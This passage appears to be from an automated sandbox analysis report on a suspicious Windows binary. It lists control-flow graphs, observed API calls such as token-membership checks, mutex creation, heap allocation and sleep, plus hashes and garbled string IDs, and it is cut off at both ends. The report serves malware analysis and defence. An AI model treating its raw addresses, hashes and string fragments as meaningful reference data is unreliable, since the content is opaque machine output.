1311->1338 1312->1274 1313->1274 1340 7ff6a795137c-7ff6a7951382 1314->1340 1341 7ff6a7951a1e-7ff6a7951a42 1314->1341 1315->1274 1353 7ff6a795159a-7ff6a79515c8 1315->1353 1316->1274 1317->1274 1318->1274 1354 7ff6a79515e5-7ff6a795161a call 7ff6a7936650 1318->1354 1319->1274 1342 7ff6a7951a6b-7ff6a7951a70 1320->1342 1343 7ff6a79513d0-7ff6a79513d6 1320->1343 1321->1274 1355 7ff6a7951637-7ff6a7951644 1321->1355 1376 7ff6a7951c00-7ff6a7951c06 1322->1376 1345 7ff6a7951a97-7ff6a7951aaa 1323->1345 1346 7ff6a7951430-7ff6a7951436 1323->1346 1324->1274 1325->1274 1326->1274 1356 7ff6a7951661-7ff6a7951690 1326->1356 1327->1274 1328->1274 1357 7ff6a79516ad-7ff6a79516c3 1328->1357 1347 7ff6a79514a4-7ff6a79514aa 1329->1347 1348 7ff6a7951ac5-7ff6a7951b42 1329->1348 1330->1274 1331->1274 1332->1274 1358 7ff6a79516e0-7ff6a7951762 call 7ff6a7936650 1332->1358 1359 7ff6a7951298-7ff6a795129e 1333->1359 1360 7ff6a7951930-7ff6a7951a05 1333->1360 1344 7ff6a795191e-7ff6a795192b 1334->1344 1335->1274 1336->1274 1361 7ff6a795177f-7ff6a795179b 1336->1361 1337->1274 1338->1274 1340->1274 1363 7ff6a7951388-7ff6a7951399 1340->1363 1341->1274 1342->1274 1343->1274 1364 7ff6a79513dc-7ff6a79513ec 1343->1364 1344->1274 1345->1274 1346->1274 1365 7ff6a795143c-7ff6a795147b call 7ff6a7935a30 1346->1365 1347->1274 1366 7ff6a79514b0-7ff6a79514f4 call 7ff6a7936240 1347->1366 1348->1274 1350->1274 1351->1274 1368 7ff6a7951c6a-7ff6a7951ca0 1351->1368 1352->1274 1353->1274 1354->1274 1355->1274 1356->1344 1357->1274 1358->1274 1359->1274 1371 7ff6a79512a0-7ff6a7951333 1359->1371 1360->1274 1361->1274 1363->1274 1364->1274 1365->1376 1366->1274 1371->1274 1376->1274
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: )T9t$*T9t$*T9t$*T9t$/s `$/s `$0c5e$1c5e$1c5e$1c5e$M/$N/$N/
                                                            • API String ID: 0-3264353044
                                                            • Opcode ID: 52ac615ff954e0cb1623ccdd4f79707b1b4d60bdea059d6d3d09024c882990a8
                                                            • Instruction ID: 953f07116c26ca824a1a792c7553c05374dd5a151fd1aa0914e9dfadf160a3f2
                                                            • Opcode Fuzzy Hash: 52ac615ff954e0cb1623ccdd4f79707b1b4d60bdea059d6d3d09024c882990a8
                                                            • Instruction Fuzzy Hash: 0142C832A46B9689EB748F79E8903BC23A0FF58789F144137DE4E97B55DF38A4848341
                                                            Function 00007FF6A794FD80 Relevance: 3.1, APIs: 2, Instructions: 105COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1606 7ff6a794fd80-7ff6a794fda3 1607 7ff6a794fdd0-7ff6a794fdd6 1606->1607 1608 7ff6a794fdd8-7ff6a794fdde 1607->1608 1609 7ff6a794fe20-7ff6a794fe26 1607->1609 1610 7ff6a794fda5-7ff6a794fdc7 1608->1610 1611 7ff6a794fde0-7ff6a794fde6 1608->1611 1612 7ff6a794fe2c-7ff6a794fe32 1609->1612 1613 7ff6a794fed1-7ff6a794ff18 call 7ff6a79562d0 * 2 1609->1613 1610->1607 1617 7ff6a794fde8-7ff6a794fdee 1611->1617 1618 7ff6a794fe43-7ff6a794fecc AllocateAndInitializeSid 1611->1618 1614 7ff6a794ff1d-7ff6a794ff23 1612->1614 1615 7ff6a794fe38-7ff6a794fe41 1612->1615 1613->1607 1614->1607 1620 7ff6a794ff29-7ff6a794ff40 1614->1620 1615->1607 1617->1607 1622 7ff6a794fdf0-7ff6a794fe17 CheckTokenMembership 1617->1622 1618->1607 1622->1607
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID: CheckMembershipToken
                                                            • String ID:
                                                            • API String ID: 1351025785-0
                                                            • Opcode ID: 522fb8e5d19797852ef72df51122bf06f82cf7302373fd90b2289b7038c2ccb2
                                                            • Instruction ID: adefd7ea8a2a28c71f963c4f0d0fb7401ac0d6ad185a86bae50208ff4b892c75
                                                            • Opcode Fuzzy Hash: 522fb8e5d19797852ef72df51122bf06f82cf7302373fd90b2289b7038c2ccb2
                                                            • Instruction Fuzzy Hash: 4A41B336F2571689FB248FA5E89437D36B1B784788F140026DE1E57B59CF3CD4418700
                                                            Function 00007FF6A78E62A0 Relevance: 21.2, APIs: 2, Strings: 10, Instructions: 234COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1385 7ff6a78e62a0-7ff6a78e6312 call 7ff6a78dea40 1388 7ff6a78e6330-7ff6a78e6337 1385->1388 1389 7ff6a78e6380-7ff6a78e6386 1388->1389 1390 7ff6a78e6339-7ff6a78e633f 1388->1390 1391 7ff6a78e63d0-7ff6a78e63d6 1389->1391 1392 7ff6a78e6388-7ff6a78e638e 1389->1392 1393 7ff6a78e6345-7ff6a78e634b 1390->1393 1394 7ff6a78e6420-7ff6a78e6426 1390->1394 1397 7ff6a78e63dc-7ff6a78e63e2 1391->1397 1398 7ff6a78e6519-7ff6a78e651f 1391->1398 1395 7ff6a78e6394-7ff6a78e639c 1392->1395 1396 7ff6a78e64f7-7ff6a78e64fd 1392->1396 1399 7ff6a78e6351-7ff6a78e6357 1393->1399 1400 7ff6a78e649c-7ff6a78e64a2 1393->1400 1401 7ff6a78e655c-7ff6a78e6562 1394->1401 1402 7ff6a78e642c-7ff6a78e6432 1394->1402 1395->1388 1405 7ff6a78e639e-7ff6a78e63a4 1395->1405 1410 7ff6a78e6503-7ff6a78e6509 1396->1410 1411 7ff6a78e6674-7ff6a78e6679 1396->1411 1408 7ff6a78e65ea-7ff6a78e660c 1397->1408 1409 7ff6a78e63e8-7ff6a78e63ee 1397->1409 1412 7ff6a78e6525-7ff6a78e652b 1398->1412 1413 7ff6a78e667e-7ff6a78e6683 1398->1413 1414 7ff6a78e635d-7ff6a78e6363 1399->1414 1415 7ff6a78e658c-7ff6a78e659b 1399->1415 1406 7ff6a78e6661-7ff6a78e666f call 7ff6a7950000 1400->1406 1407 7ff6a78e64a8-7ff6a78e64ae 1400->1407 1403 7ff6a78e6688-7ff6a78e668f 1401->1403 1404 7ff6a78e6568-7ff6a78e6570 1401->1404 1416 7ff6a78e6635-7ff6a78e6644 1402->1416 1417 7ff6a78e6438-7ff6a78e643e 1402->1417 1426 7ff6a78e6695-7ff6a78e669d 1403->1426 1427 7ff6a78e6314-7ff6a78e6325 1403->1427 1404->1388 1418 7ff6a78e6576-7ff6a78e6587 FindCloseChangeNotification 1404->1418 1419 7ff6a78e65c0-7ff6a78e65e5 1405->1419 1420 7ff6a78e63aa-7ff6a78e63b2 1405->1420 1406->1388 1407->1427 1428 7ff6a78e64b4-7ff6a78e64bc 1407->1428 1408->1388 1421 7ff6a78e63f4-7ff6a78e63fc 1409->1421 1422 7ff6a78e6611-7ff6a78e6630 1409->1422 1429 7ff6a78e650f-7ff6a78e6514 1410->1429 1430 7ff6a78e66a8-7ff6a78e66b0 1410->1430 1411->1388 1431 7ff6a78e6531-7ff6a78e654c 1412->1431 1432 7ff6a78e66b8-7ff6a78e66c0 1412->1432 1413->1388 1433 7ff6a78e65a0-7ff6a78e65aa 1414->1433 1434 7ff6a78e6369-7ff6a78e6371 1414->1434 1415->1388 1416->1388 1424 7ff6a78e6444-7ff6a78e644c 1417->1424 1425 7ff6a78e6649-7ff6a78e665c 1417->1425 1418->1388 1419->1388 1420->1388 1435 7ff6a78e63b8-7ff6a78e63c7 1420->1435 1421->1388 1438 7ff6a78e6402-7ff6a78e6412 call 7ff6a7956f90 1421->1438 1422->1388 1424->1388 1440 7ff6a78e6452-7ff6a78e648c 1424->1440 1425->1388 1426->1427 1441 7ff6a78e66a3 1426->1441 1427->1388 1428->1388 1443 7ff6a78e64c2-7ff6a78e64d3 1428->1443 1429->1388 1430->1388 1442 7ff6a78e66b6 1430->1442 1431->1388 1445 7ff6a78e6552-7ff6a78e6557 1431->1445 1432->1388 1444 7ff6a78e66c6 call 7ff6a79562d0 1432->1444 1436 7ff6a78e65b1-7ff6a78e65bb 1433->1436 1437 7ff6a78e65ac 1433->1437 1434->1388 1446 7ff6a78e6373-7ff6a78e6378 1434->1446 1435->1388 1436->1388 1437->1436 1438->1388 1440->1388 1448 7ff6a78e6492-7ff6a78e6497 1440->1448 1441->1388 1449 7ff6a78e66cb-7ff6a78e66e3 1442->1449 1450 7ff6a78e64d5 1443->1450 1451 7ff6a78e64da-7ff6a78e64f2 CreateMutexExA 1443->1451 1444->1449 1445->1388 1446->1388 1448->1388 1450->1451 1451->1388
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: D[($E[($E[($R/Z$R/Z$Y!]U$Z!]U$Z!]U$|ATR$|ATR
                                                            • API String ID: 0-3639109082
                                                            • Opcode ID: fe49797dd5db072f339af8a0506b63d8e3430d78cc994132bfb7bc55fbfac85e
                                                            • Instruction ID: 5de2ff5e69a38ceb4995cc3b1af1682008bbd19fcd297f2a3947bdf8482687b3
                                                            • Opcode Fuzzy Hash: fe49797dd5db072f339af8a0506b63d8e3430d78cc994132bfb7bc55fbfac85e
                                                            • Instruction Fuzzy Hash: 8191FB31B1E64B86EA784F1994B023E5EA0AF56754F5000BEFA9FC7BA5DF1CE8418701
                                                            Function 00007FF6A7951FB0 Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 561COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1454 7ff6a7951fb0-7ff6a7951ff6 1455 7ff6a7952009-7ff6a795201b 1454->1455 1456 7ff6a79520f0-7ff6a79520f7 1455->1456 1457 7ff6a7952021-7ff6a7952028 1455->1457 1458 7ff6a79520fd-7ff6a7952104 1456->1458 1459 7ff6a7952210-7ff6a7952217 1456->1459 1460 7ff6a795202e-7ff6a7952035 1457->1460 1461 7ff6a7952160-7ff6a7952167 1457->1461 1464 7ff6a795210a-7ff6a7952111 1458->1464 1465 7ff6a79522db-7ff6a79522e2 1458->1465 1462 7ff6a795221d-7ff6a7952224 1459->1462 1463 7ff6a795243f-7ff6a7952446 1459->1463 1468 7ff6a795203b-7ff6a7952042 1460->1468 1469 7ff6a7952283-7ff6a795228a 1460->1469 1466 7ff6a795238a-7ff6a7952391 1461->1466 1467 7ff6a795216d-7ff6a7952174 1461->1467 1474 7ff6a795222a-7ff6a7952231 1462->1474 1475 7ff6a7952568-7ff6a795256f 1462->1475 1482 7ff6a795244c-7ff6a7952453 1463->1482 1483 7ff6a79526c7-7ff6a79526ce 1463->1483 1478 7ff6a79524f7-7ff6a79524fe 1464->1478 1479 7ff6a7952117-7ff6a795211e 1464->1479 1472 7ff6a795262a-7ff6a7952631 1465->1472 1473 7ff6a79522e8-7ff6a79522ef 1465->1473 1476 7ff6a7952397-7ff6a795239e 1466->1476 1477 7ff6a7952672-7ff6a7952679 1466->1477 1484 7ff6a795217a-7ff6a7952181 1467->1484 1485 7ff6a7952538-7ff6a795253f 1467->1485 1470 7ff6a795249a-7ff6a79524a1 1468->1470 1471 7ff6a7952048-7ff6a795204f 1468->1471 1480 7ff6a79525c4-7ff6a79525cb 1469->1480 1481 7ff6a7952290-7ff6a7952297 1469->1481 1504 7ff6a7952996-7ff6a79529c8 1470->1504 1505 7ff6a79524a7-7ff6a79524ba 1470->1505 1486 7ff6a7952055-7ff6a795205c 1471->1486 1487 7ff6a79526ff-7ff6a795271c 1471->1487 1490 7ff6a7952637-7ff6a795264a 1472->1490 1491 7ff6a7952af2-7ff6a7952afc 1472->1491 1488 7ff6a7952862-7ff6a7952870 1473->1488 1489 7ff6a79522f5-7ff6a79522fc 1473->1489 1508 7ff6a7952237-7ff6a795223e 1474->1508 1509 7ff6a79527c4-7ff6a79527c9 1474->1509 1512 7ff6a7952a35-7ff6a7952a87 1475->1512 1513 7ff6a7952575-7ff6a7952588 1475->1513 1494 7ff6a79523a4-7ff6a79523ab 1476->1494 1495 7ff6a795290e-7ff6a7952949 1476->1495 1492 7ff6a7952b0c-7ff6a7952b21 1477->1492 1493 7ff6a795267f-7ff6a7952692 1477->1493 1506 7ff6a79529cd-7ff6a79529e3 1478->1506 1507 7ff6a7952504-7ff6a7952517 1478->1507 1496 7ff6a7952733-7ff6a795274c 1479->1496 1497 7ff6a7952124-7ff6a795212b 1479->1497 1516 7ff6a7952aaf-7ff6a7952aed 1480->1516 1517 7ff6a79525d1-7ff6a79525e4 1480->1517 1514 7ff6a795229d-7ff6a79522a4 1481->1514 1515 7ff6a79527e0-7ff6a7952803 1481->1515 1500 7ff6a795298c 1482->1500 1501 7ff6a7952459-7ff6a7952476 1482->1501 1498 7ff6a7952b26-7ff6a7952b3a 1483->1498 1499 7ff6a79526d4-7ff6a79526e7 1483->1499 1502 7ff6a795275b-7ff6a7952793 1484->1502 1503 7ff6a7952187-7ff6a795218e 1484->1503 1510 7ff6a7952545-7ff6a7952558 1485->1510 1511 7ff6a7952a10-7ff6a7952a30 1485->1511 1519 7ff6a7952062-7ff6a7952075 1486->1519 1520 7ff6a7952721-7ff6a795272e 1486->1520 1526 7ff6a7952000-7ff6a7952006 1487->1526 1533 7ff6a7952877-7ff6a79528c9 1488->1533 1534 7ff6a7952872 1488->1534 1539 7ff6a7952302-7ff6a7952315 1489->1539 1540 7ff6a79528ce-7ff6a79528f1 1489->1540 1490->1455 1521 7ff6a7952650-7ff6a795266d 1490->1521 1491->1526 1548 7ff6a7952b02-7ff6a7952b07 1491->1548 1492->1526 1493->1455 1522 7ff6a7952698-7ff6a79526c2 1493->1522 1543 7ff6a795297a-7ff6a7952987 1494->1543 1544 7ff6a79523b1-7ff6a79523c4 1494->1544 1537 7ff6a795294b 1495->1537 1538 7ff6a7952950-7ff6a7952975 1495->1538 1496->1526 1523 7ff6a7952751-7ff6a7952756 1497->1523 1524 7ff6a7952131-7ff6a7952144 1497->1524 1568 7ff6a7952b44-7ff6a7952b59 1498->1568 1499->1455 1525 7ff6a79526ed-7ff6a79526f5 1499->1525 1500->1504 1501->1455 1547 7ff6a795247c-7ff6a795248f 1501->1547 1502->1526 1527 7ff6a7952798-7ff6a79527bf 1503->1527 1528 7ff6a7952194-7ff6a79521a7 1503->1528 1504->1526 1505->1455 1549 7ff6a79524c0-7ff6a79524f2 1505->1549 1541 7ff6a79529ea-7ff6a7952a0b 1506->1541 1542 7ff6a79529e5 1506->1542 1507->1455 1550 7ff6a795251d-7ff6a7952533 1507->1550 1529 7ff6a7952244-7ff6a7952257 1508->1529 1530 7ff6a79527ce-7ff6a79527db 1508->1530 1509->1526 1510->1455 1551 7ff6a795255e-7ff6a7952563 1510->1551 1511->1455 1545 7ff6a7952a89 1512->1545 1546 7ff6a7952a8f-7ff6a7952a96 1512->1546 1513->1455 1552 7ff6a795258e-7ff6a79525bf 1513->1552 1535 7ff6a79522aa-7ff6a79522bd 1514->1535 1536 7ff6a795283c-7ff6a795285d 1514->1536 1531 7ff6a795280a-7ff6a7952837 1515->1531 1532 7ff6a7952805 1515->1532 1516->1526 1517->1455 1518 7ff6a79525ea-7ff6a795260c 1517->1518 1553 7ff6a7952614-7ff6a7952625 1518->1553 1554 7ff6a795260e 1518->1554 1519->1455 1555 7ff6a7952077-7ff6a7952085 1519->1555 1520->1526 1521->1526 1522->1526 1523->1526 1524->1455 1556 7ff6a795214a-7ff6a795214f 1524->1556 1525->1487 1526->1455 1527->1526 1528->1455 1557 7ff6a79521ad-7ff6a79521f9 IsDlgButtonChecked 1528->1557 1529->1455 1559 7ff6a795225d-7ff6a795227e 1529->1559 1530->1526 1531->1526 1532->1531 1533->1526 1534->1533 1535->1455 1560 7ff6a79522c3-7ff6a79522cd 1535->1560 1536->1526 1537->1538 1538->1526 1539->1455 1563 7ff6a795231b-7ff6a795237f IsDlgButtonChecked 1539->1563 1561 7ff6a79528f9-7ff6a7952909 1540->1561 1562 7ff6a79528f3 1540->1562 1541->1455 1542->1541 1543->1526 1544->1455 1564 7ff6a79523ca-7ff6a795242f IsDlgButtonChecked 1544->1564 1545->1546 1565 7ff6a7952a98 1546->1565 1566 7ff6a7952a9e-7ff6a7952aa1 1546->1566 1547->1455 1567 7ff6a7952495 1547->1567 1548->1526 1549->1526 1550->1526 1551->1526 1552->1526 1553->1526 1554->1553 1569 7ff6a795208c-7ff6a79520e6 1555->1569 1570 7ff6a7952087 1555->1570 1556->1526 1571 7ff6a7951ff8-7ff6a7951ffa 1557->1571 1572 7ff6a79521ff 1557->1572 1559->1526 1573 7ff6a79522d4-7ff6a79522d6 1560->1573 1574 7ff6a79522cf 1560->1574 1561->1526 1562->1561 1563->1571 1575 7ff6a7952385 1563->1575 1564->1571 1576 7ff6a7952435-7ff6a795243a 1564->1576 1565->1566 1566->1526 1577 7ff6a7952aa7-7ff6a7952aaa 1566->1577 1567->1568 1569->1526 1570->1569 1571->1526 1572->1576 1573->1526 1574->1573 1575->1576 1576->1571 1577->1526
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 7^D$8^D$8^D
                                                            • API String ID: 0-794861558
                                                            • Opcode ID: 8efee688c4fc5ce4d0abd523c3a3413b1b7b79149eb7cdc3ccb557ec44a0a08d
                                                            • Instruction ID: 43585e9cd2d9435c73c8658e16c770ef5e8a338dac8b02f58770ef44805df72a
                                                            • Opcode Fuzzy Hash: 8efee688c4fc5ce4d0abd523c3a3413b1b7b79149eb7cdc3ccb557ec44a0a08d
                                                            • Instruction Fuzzy Hash: F942A2B660EBD281EA788F15F4603BA73A1E784B91F504137DE8E87B99CE3CD5448B05
                                                            Function 00007FF6A7956F90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1578 7ff6a7956f90-7ff6a7956fb7 1579 7ff6a7956fc0-7ff6a7956fc5 1578->1579 1580 7ff6a7956fc7-7ff6a7956fcc 1579->1580 1581 7ff6a7957000-7ff6a7957005 1579->1581 1582 7ff6a7956fce-7ff6a7956fd3 1580->1582 1583 7ff6a7957040-7ff6a7957045 1580->1583 1584 7ff6a795706b-7ff6a7957070 1581->1584 1585 7ff6a7957007-7ff6a795700c 1581->1585 1590 7ff6a79570a9-7ff6a79570cb 1582->1590 1591 7ff6a7956fd9-7ff6a7956fde 1582->1591 1586 7ff6a795704b-7ff6a7957050 1583->1586 1587 7ff6a795713f-7ff6a795715e 1583->1587 1588 7ff6a7957076-7ff6a795707b 1584->1588 1589 7ff6a7956fb9-7ff6a7956fbe 1584->1589 1592 7ff6a7957012-7ff6a7957017 1585->1592 1593 7ff6a7957100-7ff6a7957113 1585->1593 1594 7ff6a7957056-7ff6a795705b 1586->1594 1595 7ff6a7957163-7ff6a795717c RtlRestoreThreadPreferredUILanguages 1586->1595 1587->1579 1596 7ff6a7957181-7ff6a7957186 1588->1596 1597 7ff6a7957081-7ff6a79570a4 1588->1597 1589->1579 1590->1579 1598 7ff6a7956fe4-7ff6a7956fe9 1591->1598 1599 7ff6a79570d0-7ff6a79570fb 1591->1599 1600 7ff6a795701d-7ff6a7957022 1592->1600 1601 7ff6a7957118-7ff6a795713a 1592->1601 1593->1579 1594->1579 1603 7ff6a7957061-7ff6a7957066 1594->1603 1595->1579 1596->1579 1605 7ff6a795718c-7ff6a7957196 1596->1605 1597->1579 1598->1579 1604 7ff6a7956feb-7ff6a7956ff9 1598->1604 1599->1579 1600->1579 1602 7ff6a7957024-7ff6a7957031 1600->1602 1601->1579 1602->1579 1603->1579 1604->1579
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: OKv&$PKv&$PKv&
                                                            • API String ID: 0-255456735
                                                            • Opcode ID: 6ad3be0f4e824cef6f0ae4f885d4ce03afb91ffdb21e4f9dba7eb1de6b05c2fc
                                                            • Instruction ID: 72efae88855715f35279fa9ee9a613119ebf712a5c900524f11742d5b7344e67
                                                            • Opcode Fuzzy Hash: 6ad3be0f4e824cef6f0ae4f885d4ce03afb91ffdb21e4f9dba7eb1de6b05c2fc
                                                            • Instruction Fuzzy Hash: A541E722E0E51387FA684F29799003A66E29F84746F244537FD4DCB79ACD2DED4E8B01
                                                            Function 00007FF6A7956A60 Relevance: 1.6, APIs: 1, Instructions: 134memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1625 7ff6a7956a60-7ff6a7956a71 1626 7ff6a7956aa0-7ff6a7956aa5 1625->1626 1627 7ff6a7956aa7-7ff6a7956aac 1626->1627 1628 7ff6a7956b00-7ff6a7956b05 1626->1628 1631 7ff6a7956ab2-7ff6a7956ab7 1627->1631 1632 7ff6a7956b80-7ff6a7956b85 1627->1632 1629 7ff6a7956b0b-7ff6a7956b10 1628->1629 1630 7ff6a7956bc2-7ff6a7956bc7 1628->1630 1633 7ff6a7956b16-7ff6a7956b1b 1629->1633 1634 7ff6a7956c29-7ff6a7956c2e 1629->1634 1639 7ff6a7956bcd-7ff6a7956bd2 1630->1639 1640 7ff6a7956c99-7ff6a7956ca8 1630->1640 1637 7ff6a7956abd-7ff6a7956ac2 1631->1637 1638 7ff6a7956be2-7ff6a7956c0a 1631->1638 1635 7ff6a7956b8b-7ff6a7956b90 1632->1635 1636 7ff6a7956c4e-7ff6a7956c73 1632->1636 1641 7ff6a7956c33-7ff6a7956c49 call 7ff6a79576a0 1633->1641 1642 7ff6a7956b21-7ff6a7956b26 1633->1642 1634->1626 1645 7ff6a7956b96-7ff6a7956b9b 1635->1645 1646 7ff6a7956a73-7ff6a7956a97 1635->1646 1643 7ff6a7956c7b-7ff6a7956c81 1636->1643 1644 7ff6a7956c75 1636->1644 1647 7ff6a7956ac8-7ff6a7956acd 1637->1647 1648 7ff6a7956c0f-7ff6a7956c19 1637->1648 1638->1626 1649 7ff6a7956cad-7ff6a7956cb2 1639->1649 1650 7ff6a7956bd8-7ff6a7956bdd 1639->1650 1640->1626 1641->1626 1642->1626 1653 7ff6a7956b2c-7ff6a7956b7b RtlAllocateHeap 1642->1653 1654 7ff6a7956c89-7ff6a7956c8b 1643->1654 1655 7ff6a7956c83 1643->1655 1644->1643 1645->1626 1656 7ff6a7956ba1-7ff6a7956bbd 1645->1656 1646->1626 1647->1626 1657 7ff6a7956acf-7ff6a7956ae8 1647->1657 1648->1626 1651 7ff6a7956c1f-7ff6a7956c24 1648->1651 1649->1626 1658 7ff6a7956cb8-7ff6a7956cc2 1649->1658 1650->1626 1651->1626 1653->1626 1654->1626 1662 7ff6a7956c91-7ff6a7956c94 1654->1662 1655->1654 1656->1626 1659 7ff6a7956aea 1657->1659 1660 7ff6a7956af0-7ff6a7956afc 1657->1660 1659->1660 1660->1626 1662->1626
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: fa28e2dba59320d463a46773328e01b69f3420a29493d2dae4aeaf659b3411b1
                                                            • Instruction ID: b5f6d831487b5ba5e3dcc788e6fa7b48a8a9fc0bd0f4968daa42363887996338
                                                            • Opcode Fuzzy Hash: fa28e2dba59320d463a46773328e01b69f3420a29493d2dae4aeaf659b3411b1
                                                            • Instruction Fuzzy Hash: 0B510726A1E66347EE74CF29B0A017E7790DB86F55F544137E68EC7BA2CD2CE8448700
                                                            Function 00007FF6A78E3460 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1664 7ff6a78e3460-7ff6a78e34d8 1665 7ff6a78e3500-7ff6a78e3505 1664->1665 1666 7ff6a78e3580-7ff6a78e3585 1665->1666 1667 7ff6a78e3507-7ff6a78e350c 1665->1667 1670 7ff6a78e35c0-7ff6a78e3618 1666->1670 1671 7ff6a78e3587-7ff6a78e358c 1666->1671 1668 7ff6a78e350e-7ff6a78e3513 1667->1668 1669 7ff6a78e34da-7ff6a78e34fa call 7ff6a794ffb0 1667->1669 1672 7ff6a78e35a1-7ff6a78e35bb call 7ff6a794ffb0 SleepEx 1668->1672 1673 7ff6a78e3519-7ff6a78e351e 1668->1673 1669->1665 1670->1665 1674 7ff6a78e3592-7ff6a78e359c 1671->1674 1675 7ff6a78e361d-7ff6a78e3622 1671->1675 1672->1665 1673->1665 1677 7ff6a78e3520-7ff6a78e356c call 7ff6a79326f0 1673->1677 1674->1665 1675->1665 1679 7ff6a78e3628-7ff6a78e3640 1675->1679 1683 7ff6a78e3571-7ff6a78e357e 1677->1683 1683->1665
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2821199076.00007FF6A78D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6A78D0000, based on PE: true
                                                            • Associated: 00000007.00000002.2821173291.00007FF6A78D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821419598.00007FF6A795F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000007.00000002.2821495926.00007FF6A79C3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff6a78d0000_5587.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 8a426737fd3880adcc92548b3d3c0d4f44655cb1d8f13824e967f4b7c8c84ef5
                                                            • Instruction ID: 84583eef81cac9fe724a22cfc9fb33cac9b3827fe7160053670416f582b6ad56
